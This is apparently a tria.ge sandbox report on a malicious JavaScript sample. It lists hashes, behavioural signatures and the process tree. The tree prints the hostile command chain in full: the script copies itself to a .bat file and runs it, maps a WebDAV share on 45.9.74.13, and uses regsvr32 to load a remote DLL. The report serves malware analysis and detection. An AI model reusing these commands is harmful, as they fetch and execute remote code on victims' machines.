Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
10s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
09/07/2024, 08:19
Static task
static1
Behavioral task
behavioral1
Sample
28034278092616319677.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
28034278092616319677.js
Resource
win10v2004-20240704-en
General
-
Target
28034278092616319677.js
-
Size
14KB
-
MD5
1234aebaf9d395b177bfa95b56c61dc2
-
SHA1
b8458ddbfec3baf6433537a68ed36076daace166
-
SHA256
df085d537d229075c1fbda32e736671566e856ccb2258b06d4666c315d980e91
-
SHA512
dfdd614329a595df31a3a5a61ab14fd8a425f55f6c6696aa30173b5727a65ee06f586ed65ad6709aba339876082be334930a619b6c77d102c03d096eccedbcd9
-
SSDEEP
384:F7iiDcO+vvck10SOuTVgb/NdVQzRNs83YY83Ye:8Ac/cvF7dqe
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 3052 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2124 wrote to memory of 2904 2124 wscript.exe 29 PID 2124 wrote to memory of 2904 2124 wscript.exe 29 PID 2124 wrote to memory of 2904 2124 wscript.exe 29 PID 2904 wrote to memory of 2704 2904 cmd.exe 31 PID 2904 wrote to memory of 2704 2904 cmd.exe 31 PID 2904 wrote to memory of 2704 2904 cmd.exe 31 PID 2904 wrote to memory of 3052 2904 cmd.exe 32 PID 2904 wrote to memory of 3052 2904 cmd.exe 32 PID 2904 wrote to memory of 3052 2904 cmd.exe 32 PID 2904 wrote to memory of 3052 2904 cmd.exe 32 PID 2904 wrote to memory of 3052 2904 cmd.exe 32
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\28034278092616319677.js1⤵
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\28034278092616319677.js" "C:\Users\Admin\AppData\Local\Temp\\prepareringwooden.bat" && "C:\Users\Admin\AppData\Local\Temp\\prepareringwooden.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2704
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\17.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3052
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
14KB
MD51234aebaf9d395b177bfa95b56c61dc2
SHA1b8458ddbfec3baf6433537a68ed36076daace166
SHA256df085d537d229075c1fbda32e736671566e856ccb2258b06d4666c315d980e91
SHA512dfdd614329a595df31a3a5a61ab14fd8a425f55f6c6696aa30173b5727a65ee06f586ed65ad6709aba339876082be334930a619b6c77d102c03d096eccedbcd9